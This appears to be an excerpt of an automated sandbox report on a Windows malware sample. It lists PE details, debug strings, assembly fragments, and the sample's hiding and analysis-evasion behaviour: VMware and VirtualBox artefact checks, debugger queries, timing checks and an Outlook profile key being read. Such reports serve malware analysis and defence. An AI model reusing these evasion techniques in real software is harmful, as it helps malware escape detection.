            Source: C:\Windows\SysWOW64\sfc.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
            Source: NdYuOgHbM9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: NdYuOgHbM9.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: NdYuOgHbM9.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
            Source: Binary string: mscorlib.pdbMZ source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: ngen.pdb source: sfc.exe, 0000000C.00000002.4093679938.000000000379C000.00000004.10000000.00040000.00000000.sdmp, sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4093054650.000000000332C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2130456184.000000001A6AC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: System.pdb` source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdbUGP source: ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: System.Drawing.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: wntdll.pdb source: ngen.exe, ngen.exe, 00000005.00000002.1848086680.0000000005700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, sfc.exe, 0000000C.00000002.4092885357.0000000003170000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1849713302.0000000002FC0000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000003.1847772604.0000000002E11000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000C.00000002.4092885357.000000000330E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.ni.pdbRSDS& source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Drawing.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: Microsoft.VisualBasic.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092220680.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000000.1911809244.0000000000B1E000.00000002.00000001.01000000.00000007.sdmp
            Source: Binary string: System.Drawing.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: mscorlib.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: sfc.pdb source: ngen.exe, 00000005.00000002.1847926282.00000000052A7000.00000004.00000020.00020000.00000000.sdmp, tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 0000000B.00000002.4092313230.0000000000D0E000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: System.ni.pdb source: WER943D.tmp.dmp.9.dr
            Source: Binary string: System.Core.ni.pdbRSDS source: WER943D.tmp.dmp.9.dr
            Source: NdYuOgHbM9.exeStatic PE information: 0x8ECA66DD [Thu Nov 30 04:34:37 2045 UTC]
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A7967 push ebx; retf 0_2_00007FFD9B8A796A
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B8A752B push ebx; iretd 0_2_00007FFD9B8A756A
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeCode function: 0_2_00007FFD9B98026B push esp; retf 4810h0_2_00007FFD9B980312
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0041414A push edi; ret 5_2_0041414B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040216F push cs; ret 5_2_0040217D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00411279 push eax; ret 5_2_004112A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00417A13 pushfd ; iretd 5_2_00417A15
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00411283 push eax; ret 5_2_004112A2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_004053DE push edx; ret 5_2_004053E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00423383 push esi; iretd 5_2_0042339B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_00403550 push eax; ret 5_2_00403552
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0040CD07 push edi; retf 5_2_0040CD0E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0041DD80 pushad ; ret 5_2_0041DD81
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057309AD push ecx; mov dword ptr [esp], ecx5_2_057309B6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_031A09AD push ecx; mov dword ptr [esp], ecx12_2_031A09B6
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B2DE push cs; iretd 12_2_02A9B2DF
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9B14F push es; iretd 12_2_02A9B15B
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02AA24E9 push ds; ret 12_2_02AA24F4
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A944C0 pushfd ; iretd 12_2_02A944C2
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DB32 push F61E88C4h; retf 12_2_02A8DB3A
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9A82D pushad ; ret 12_2_02A9A82E
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A81E8B push edx; ret 12_2_02A81E8D
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FE30 push esi; iretd 12_2_02A9FE48
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FD83 push esi; iretd 12_2_02A9FD40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A9FD2D push esi; iretd 12_2_02A9FD40
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DD26 push eax; ret 12_2_02A8DD4F
            Source: C:\Windows\SysWOW64\sfc.exeCode function: 12_2_02A8DD30 push eax; ret 12_2_02A8DD4F

            Hooking and other Techniques for Hiding and Protection

            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
            Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\sfc.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            Source: Yara match File source: Process Memory Space: NdYuOgHbM9.exe PID: 2060, type: MEMORYSTR
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBIEDLL.DLL
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe Memory allocated: 1EF38FB0000 memory reserve | memory write watch
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe Memory allocated: 1EF52960000 memory reserve | memory write watch
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_057AD1C0 rdtsc 5_2_057AD1C0
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6507
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3204
            Source: C:\Windows\SysWOW64\sfc.exe Window / User API: threadDelayed 9834
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe API coverage: 0.8 %
            Source: C:\Windows\SysWOW64\sfc.exe API coverage: 3.0 %
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336 Thread sleep time: -5534023222112862s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756 Thread sleep count: 136 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756 Thread sleep time: -272000s >= -30000s
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756 Thread sleep count: 9834 > 30
            Source: C:\Windows\SysWOW64\sfc.exe TID: 7756 Thread sleep time: -19668000s >= -30000s
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848 Thread sleep time: -75000s >= -30000s
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848 Thread sleep count: 37 > 30
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848 Thread sleep time: -55500s >= -30000s
            Source: C:\Program Files (x86)\sXZLxxxVCvpdQOMpmsJLTDHHUKeepOfvgbaNCsuUxLUHfDBqRMOvfXspILySfYOM\tyVvDSdgzXcAfzWUYqtqOHNMkF.exe TID: 7848 Thread sleep time: -37000s >= -30000s
            Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exe Last function: Thread delayed
            Source: C:\Windows\SysWOW64\sfc.exe Code function: 12_2_02A9B800 FindFirstFileW,FindNextFileW,FindClose,12_2_02A9B800
            Source: Amcache.hve.9.drBinary or memory string: VMware
            Source: Amcache.hve.9.drBinary or memory string: VMware Virtual USB Mouse
            Source: Amcache.hve.9.drBinary or memory string: vmci.syshbin
            Source: Amcache.hve.9.drBinary or memory string: VMware, Inc.
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: Amcache.hve.9.drBinary or memory string: VMware20,1hbin@
            Source: Amcache.hve.9.drBinary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
            Source: Amcache.hve.9.drBinary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: Amcache.hve.9.drBinary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\'C:\WINDOWS\system32\drivers\vmmouse.sys&C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: Amcache.hve.9.drBinary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: VMware SVGA II
            Source: Amcache.hve.9.dr Binary or memory string: c:/windows/system32/drivers/vmci.sys
            Source: Amcache.hve.9.dr Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
            Source: tyVvDSdgzXcAfzWUYqtqOHNMkF.exe, 00000010.00000002.4092344408.0000000001392000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000011.00000002.2133124462.000002AF1A6DB000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: Amcache.hve.9.dr Binary or memory string: vmci.sys
            Source: Amcache.hve.9.dr Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmmouse.sys
            Source: Amcache.hve.9.dr Binary or memory string: vmci.syshbin`
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: vmware
            Source: Amcache.hve.9.dr Binary or memory string: \driver\vmci,\driver\pci
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\vmhgfs.sys
            Source: sfc.exe, 0000000C.00000002.4091957268.0000000002CE4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS$w
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: Amcache.hve.9.dr Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
            Source: Amcache.hve.9.dr Binary or memory string: VMware20,1
            Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Generation Counter
            Source: Amcache.hve.9.dr Binary or memory string: NECVMWar VMware SATA CD00
            Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual disk SCSI Disk Device
            Source: Amcache.hve.9.dr Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
            Source: Amcache.hve.9.dr Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
            Source: Amcache.hve.9.dr Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
            Source: Amcache.hve.9.dr Binary or memory string: VMware PCI VMCI Bus Device
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: noValueButYesKey)C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: NdYuOgHbM9.exe, 00000000.00000002.1804365853.000001EF3AD80000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: C:\WINDOWS\system32\drivers\VBoxMouse.sys
            Source: Amcache.hve.9.dr Binary or memory string: VMware VMCI Bus Device
            Source: Amcache.hve.9.dr Binary or memory string: VMware Virtual RAM
            Source: Amcache.hve.9.dr Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
            Source: Amcache.hve.9.dr Binary or memory string: vmci.inf_amd64_68ed49469341f563
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
            Source: C:\Users\user\Desktop\NdYuOgHbM9.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Process queried: DebugPort
            Source: C:\Windows\SysWOW64\sfc.exe Process queried: DebugPort
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_057AD1C0 rdtsc 5_2_057AD1C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_00417363 LdrLoadDll, 5_2_00417363
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe Code function: 5_2_0576B570 mov eax, dword ptr fs:[00000030h] 5_2_0576B570
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057347FB mov eax, dword ptr fs:[00000030h]5_2_057347FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573D7E0 mov ecx, dword ptr fs:[00000030h]5_2_0573D7E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057527ED mov eax, dword ptr fs:[00000030h]5_2_057527ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573C7C0 mov eax, dword ptr fs:[00000030h]5_2_0573C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057357C0 mov eax, dword ptr fs:[00000030h]5_2_057357C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B07C3 mov eax, dword ptr fs:[00000030h]5_2_057B07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0580B73C mov eax, dword ptr fs:[00000030h]5_2_0580B73C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0575D7B0 mov eax, dword ptr fs:[00000030h]5_2_0575D7B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F7BA mov eax, dword ptr fs:[00000030h]5_2_0572F7BA
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05803749 mov eax, dword ptr fs:[00000030h]5_2_05803749
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057B97A9 mov eax, dword ptr fs:[00000030h]5_2_057B97A9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057BF7AF mov eax, dword ptr fs:[00000030h]5_2_057BF7AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057307AF mov eax, dword ptr fs:[00000030h]5_2_057307AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057EF78A mov eax, dword ptr fs:[00000030h]5_2_057EF78A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05762674 mov eax, dword ptr fs:[00000030h]5_2_05762674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F866E mov eax, dword ptr fs:[00000030h]5_2_057F866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057F866E mov eax, dword ptr fs:[00000030h]5_2_057F866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A660 mov eax, dword ptr fs:[00000030h]5_2_0576A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576A660 mov eax, dword ptr fs:[00000030h]5_2_0576A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05769660 mov eax, dword ptr fs:[00000030h]5_2_05769660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05769660 mov eax, dword ptr fs:[00000030h]5_2_05769660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574C640 mov eax, dword ptr fs:[00000030h]5_2_0574C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574E627 mov eax, dword ptr fs:[00000030h]5_2_0574E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0572F626 mov eax, dword ptr fs:[00000030h]5_2_0572F626
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05766620 mov eax, dword ptr fs:[00000030h]5_2_05766620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05768620 mov eax, dword ptr fs:[00000030h]5_2_05768620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0573262C mov eax, dword ptr fs:[00000030h]5_2_0573262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05733616 mov eax, dword ptr fs:[00000030h]5_2_05733616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05733616 mov eax, dword ptr fs:[00000030h]5_2_05733616
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05772619 mov eax, dword ptr fs:[00000030h]5_2_05772619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_05761607 mov eax, dword ptr fs:[00000030h]5_2_05761607
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_057AE609 mov eax, dword ptr fs:[00000030h]5_2_057AE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0576F603 mov eax, dword ptr fs:[00000030h]5_2_0576F603
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 5_2_0574260B mov eax, dword ptr fs:[00000030h]5_2_0574260B
